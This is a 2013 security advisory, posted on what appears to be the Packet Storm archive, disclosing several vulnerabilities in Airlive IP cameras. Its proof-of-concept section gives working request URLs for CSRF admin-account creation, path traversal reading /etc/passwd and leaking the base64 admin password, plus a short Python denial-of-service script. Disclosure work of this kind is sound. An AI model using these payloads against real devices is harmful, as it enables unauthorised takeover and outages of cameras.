exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Airlive CSRF / Traversal / Disclosure / Denial Of Service

Airlive CSRF / Traversal / Disclosure / Denial Of Service
Posted Jun 13, 2013
Authored by Javier Repiso Sanchez, Eliezer Varad Lopez, Jonas Rapero Castillo

Airlive IP cameras suffers from information disclosure, clear text storage of sensitive information, cross site request forgery, denial of service, and path traversal vulnerabilities.

tags | exploit, denial of service, vulnerability, file inclusion, info disclosure, csrf
advisories | CVE-2013-3541, CVE-2013-3686, CVE-2013-3540, CVE-2013-3687, CVE-2013-3540, CVE-2013-3541, CVE-2013-3686, CVE-2013-3687
SHA-256 | 8baad92f7fdb0f5d591127fce7424949455fbfbf4e26902a240495904f81868f

Airlive CSRF / Traversal / Disclosure / Denial Of Service

Change Mirror Download
===========================================================================
AIRLIVE
====================================================================
===========================================================================

1.Advisory Information
Title: Airlive Multiple Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
Multiple vulnerabilities have been found in this devices:
-CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103)
-CVE-2013-3541. Relative Path Traversal(CWE-23).
-CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Priveleges and Access Controls(CWE-264)
-CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312)
-CVE-2013-3691. Denial of Service

3.Affected Products
CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM
CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.
It’s possible others models are affected but they were not checked.

4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
In the following example we will make a vector to create an alternative user with administration credentials.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect=
_____________________________________________________________________________

4.2.Relative Path Traversal
CVE-2013-3541, Transversal Path that’s allow you to read file system configuration.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd
_____________________________________________________________________________

4.3.Sensitive Information Exposure + Privilege Escalation
CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID
_____________________________________________________________________________
We can decode Admin password (base64).
Now we can relogin like admin user and we have made the escalation privilege

4.4.Clear Text Storage of Sensitive Information
CVE-2013-3687 You can find all the sensitive information about the device in plain text inside the backup file.
You can open with any text editor and look for user's information for example, passwords, users and so on.

4.5.Denial of Service (DoS)
Use CVE-2013-3691, DoS by overbuffing path ‘/’. A request with a large number of ‘a’ can take down the http service from the camera device.
_____________________________________________________________________________
Request: http://xx.xx.xx.xx/[a*3000]
_____________________________________________________________________________
You will get the next message, Conexion has been reset. After remove de adds and refresh it you will get the next message, Can't Connect

It will be down for around 2min but if we are doing the request once and again each 1min for example, the camera won’t recuperate ever itself

The following Python script could be used to test the DoS:
_____________________________________________________________________________
@ request = 'GET /' + ‘A’ * 3000 + '.html HTTP/1.0\r\n'
@ s = socket.socket()
@ s.connect((cam_ip, 80))
@ s.send(request)
@ response = s.recv(1024)
@ s.close()
_____________________________________________________________________________

5.Credits

-CVE-2013-3541 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3691 was discovered by Javier Repiso Sánchez and Jonás Ropero Castillo
-CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jonás Ropero Castillo.

6.Report Timeline
-2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received.
-2013-06-03: Students asks for a reply.
-2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close